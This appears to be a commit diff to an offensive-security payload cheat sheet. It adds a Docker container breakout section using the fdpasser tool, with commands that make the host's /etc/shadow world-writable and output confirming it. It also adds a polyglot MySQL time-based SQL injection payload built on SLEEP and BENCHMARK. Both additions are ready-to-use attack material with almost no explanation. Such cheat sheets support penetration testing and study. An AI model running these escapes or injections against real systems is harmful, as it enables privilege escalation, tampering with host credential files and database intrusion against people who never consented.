Docker device file breakout
parent
f86837ca8c
commit
5b1a79cb56
|
@ -10,6 +10,7 @@
|
|||
- [Insecure Docker Registry](#insecure-docker-registry)
|
||||
- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
|
||||
- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
|
||||
- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
|
@ -164,6 +165,16 @@ $ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicio
|
|||
$ docker run --rm cve-2019-5736:malicious_image_POC
|
||||
```
|
||||
|
||||
## Breaking out of containers using a device file
|
||||
|
||||
```powershell
|
||||
https://github.com/FSecureLABS/fdpasser
|
||||
In container, as root: ./fdpasser recv /moo /etc/shadow
|
||||
Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo
|
||||
Outside container: ls -la /etc/shadow
|
||||
Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)
|
||||
|
|
|
@ -387,6 +387,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
|
|||
|
||||
```sql
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
|
||||
/* MySQL only */
|
||||
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
|
||||
```
|
||||
|
||||
## Routed injection
|
||||
|
|
Loading…
Reference in New Issue